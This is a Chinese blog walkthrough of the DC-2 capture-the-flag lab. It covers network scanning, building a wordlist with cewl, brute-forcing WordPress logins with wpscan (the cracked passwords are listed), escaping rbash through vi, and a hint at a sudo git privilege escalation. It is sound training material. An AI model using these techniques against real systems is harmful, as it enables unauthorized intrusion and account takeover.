其他分享
首页 > 其他分享> > DC-2

DC-2

作者:互联网

DC-2
扫描局域网内所有设备

arp-scan -l

在这里插入图片描述

nmap -p- -sV 扫描所有端口

在这里插入图片描述
880,7744端口,访问一下进不去
只能改hosts文件进去
在这里插入图片描述
页面使用的技术
在这里插入图片描述

用awvs扫一下(awvs yyds!)
在这里插入图片描述
可是好像msf没有收录这些漏洞
在这里插入图片描述
flag提示用cewl

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件

cewl http://dc-2 -w 1.txt

在这里插入图片描述
nikto工具扫描后台

nikto -host http://192.168.xx.xx   (默认扫描80端口)

在这里插入图片描述

wpscan(kali中针对wordpress的漏洞扫描工具)

wpscan --url http://www.xxxxx.wiki/

在这里插入图片描述
admin jerry tom

$ wpscan --url http://dc-2 -U /home/t123/桌面/user.txt -P /home/t123/桌面/cewl.txt //不知道路径可以用pwd看看

在这里插入图片描述
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient

登录,查看到flag2
在这里插入图片描述
ssh链接后rbash
在这里插入图片描述

如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受

绕过rbash

compgen -c  //查看当前用户可执行命名,发现有vi

vi编辑器绕过
在命令行中,输入 vi,在末行模式中,输入 :set shell=/bin/bash在这里插入代码片
这里就直接将shell设置为/bin/bash
接着在执行命令 :shell就好了
然后就有一个无限制的shell了
绕过rbash

git提权

sudo git help config

标签:rbash,shell,http,扫描,DC,wpscan,bash
来源: https://blog.csdn.net/weixin_46409891/article/details/115053394